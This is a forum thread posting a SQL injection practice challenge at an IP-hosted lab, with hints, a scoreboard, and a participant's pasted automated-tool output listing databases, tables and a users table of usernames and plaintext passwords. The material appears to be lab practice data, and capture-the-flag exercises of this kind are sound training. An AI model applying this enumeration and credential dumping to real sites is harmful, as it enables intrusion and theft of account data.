Hi Everyone. It’s a challenge for everyone. Let’s see who can solve this… 
Go to: http://104.129.171.125/SQLi/
Note:
/SQLi/
Hints:
http://104.129.171.125/SQLi/index.php?id=0
http://104.129.171.125/SQLi/index.php?id=1
Scoreboard
The result is based on the explanation of the problem and the manual injection technique.
- @Forhad
- @Shouvo
- @Optimize_Prime
- @Kharap_Atta
Hi. I’m sorry. It make a misunderstanding. I should mention it.
The challenge in under this path /SQLi/
before saw this ,i am also trying to main domain.
What I need to show you?
Hi @Optimize_Prime
Just do a manual Sql injection in http://104.129.171.125/SQLi/ and get the database info.
ok
hints 
boolean based blind sql injection
7 database 
mysql 5.0
admin_default
admin_security
admin_wp
information_schema
mysql
performance_schema
security
That server down 
MySQL >= 5.0.12
available databases [7]:
[.] admin_default
[.] admin_security
[.] admin_wp
[.] information_schema
[.] mysql
[.] performance_schema
[.] security
Database: security
[4 tables]
±---------+
| emails |
| referers |
| uagents |
| users |
±---------+
Database: security
Table: users
[3 columns]
±---------±------------+
| Column | Type |
±---------±------------+
| id | int(3) |
| password | varchar(20) |
| username | varchar(20) |
±---------±------------+
Database: security
Table: users
[8 entries]
±—±-----------±---------+
| id | password | username |
±—±-----------±---------+
| 1 | Dumb | Dumb |
| 2 | I-kill-you | Angelina |
| 3 | [email protected] | Dummy |
| 4 | crappy | secure |
| 5 | stupidity | stupid |
| 6 | genious | superman |
| 7 | mob!le | batman |
| 8 | admin | admin |
±—±-----------±---------+
Thanks
Well done @Kharap_Atta but POC done by automation SQL injection tools are not accepted. ex. Sqlmap/Havij
ok
